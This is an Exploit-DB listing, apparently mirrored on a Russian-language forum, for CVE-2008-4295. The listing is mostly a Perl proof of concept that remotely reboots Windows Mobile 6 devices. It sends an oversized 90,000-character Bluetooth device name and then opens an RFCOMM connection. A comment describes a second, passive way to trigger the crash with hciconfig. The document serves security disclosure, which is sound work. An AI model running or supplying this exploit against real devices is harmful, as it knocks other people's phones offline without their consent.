- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6582
- Проверка EDB
-
- Пройдено
- Автор
- JULIEN BEDARD
- Тип уязвимости
- DOS
- Платформа
- HARDWARE
- CVE
- cve-2008-4295
- Дата публикации
- 2008-09-26
Код:
#!/usr/bin/perl
#
# ----------WM6 remote overflow reboot PoC----------
# Simple exploit for remote rebooting a windows mobile device
# Maybe we can use it for doing command execution,
# I've not test it since the device is rebooting and do not dump a core
# for further analysing.
#
# The bug is not realy in the long string name but when it's the first
# time the wm6 device try to get a connection with too long name.
#
# There's two way to exploit this bug, this PoC show the first method
# (direct connect to the device if we know the bdaddr) but you can
# just wait for the device to search and overflow by itself when
# seeing the hci name:
# hciconfig <hci dev> name `perl -e 'print "A"x90000'`
# hciconfig <hci dev> piscan
# You just have to wait until the wm device search for bluetooth devices
# in range and it will be overflowed
#
# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125]
# (by Julien Bedard)
#
use Net::Bluetooth;
$target=$ARGV[0];
$hci_dev=$ARGV[1];
$overflow="A" x 90000;
$rfcomm_port="3";
if (@ARGV < 2)
{
die "Usage:\n ./wm6_dos.pl <target_mac> <hci_device>\n\n";
}
# change this lame cmd ???
system("hciconfig $hci_dev name $overflow");
$over_conn = Net::Bluetooth->newsocket("RFCOMM");
print "socket error $!\n" unless(defined($over_conn));
$over_conn->connect($target, $rfcomm_port);
# milw0rm.com [2008-09-26]
- Источник
- www.exploit-db.com